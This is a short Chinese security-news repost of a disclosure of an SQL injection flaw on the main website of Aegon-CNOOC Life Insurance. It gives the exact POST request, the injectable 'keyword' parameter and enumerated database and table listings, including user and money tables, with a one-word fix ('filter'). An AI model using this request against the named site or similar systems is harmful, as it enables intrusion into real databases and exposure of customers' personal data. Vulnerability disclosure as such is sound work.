频道栏目
首页 > 资讯 > 网站安全 > 正文

海康人寿主站SQL注射漏洞

15-03-17        来源:[db:作者]  
收藏   我要投稿

海康人寿主站SQL注射SQL注入漏洞

POST /photography/look.jsp HTTP/1.1
Content-Length: 23
Content-Type: application/x-www-form-urlencoded
Referer: http://www.aegon-cnooc.com.cn:80/
Cookie: JSESSIONID=3BE229551343BCD8E7853360EED83F51
Host: www.aegon-cnooc.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

keytype=1&keyword=1

注射参数keyword

Database: children

[11 tables]

+---------------------------------------+

| aoyun_user |

| gold_info_in |

| gold_info_out |

| inoldperson_user |

| money_user |

| oldperson_user |

| photography_user |

| question_answer |

| shandong_user |

| user |

| user_liuyan |

+---------------------------------------+



Database: information_schema

[16 tables]

+---------------------------------------+

| CHARACTER_SETS |

| COLLATIONS |

| COLLATION_CHARACTER_SET_APPLICABILITY |

| COLUMNS |

| COLUMN_PRIVILEGES |

| KEY_COLUMN_USAGE |

| ROUTINES |

| SCHEMATA |

| SCHEMA_PRIVILEGES |

| STATISTICS |

| TABLES |

| TABLE_CONSTRAINTS |

| TABLE_PRIVILEGES |

| TRIGGERS |

| USER_PRIVILEGES |

| VIEWS |

+---------------------------------------+

解决方案:
过滤
相关TAG标签
上一篇:好贷网重置任意用户密码漏洞
下一篇:Linux开发环境搭建与使用——Linux必备软件之SSH
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站